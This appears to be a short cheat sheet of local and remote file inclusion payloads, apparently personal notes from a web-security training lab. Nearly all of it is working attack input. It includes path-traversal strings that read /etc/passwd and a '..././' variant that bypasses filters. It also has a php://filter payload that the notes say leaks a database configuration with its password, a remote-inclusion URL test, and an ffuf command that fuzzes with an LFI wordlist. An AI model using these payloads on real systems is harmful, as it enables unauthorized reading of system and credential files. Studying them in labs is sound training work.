LFI/RFI

?=../../../../../../etc/passwd

# Bypass filter ../
?=..././..././..././..././..././etc/passwd

?=http://google.com

# API

/labs/api/fetchRecipe.php?filename=..././..././..././..././..././..././..././etc/passwd

# It will return db configuration
# With the db password
/labs/fi0x02.php?filename=php://filter/convert.base64-encode/resource=..././db.php

ffuf -request api-req.txt -request-proto http -w /usr/share/wordlists/seclists/SecLists-master/Fuzzing/LFI/LFI-Jhaddix.txt

Last updated 1 year ago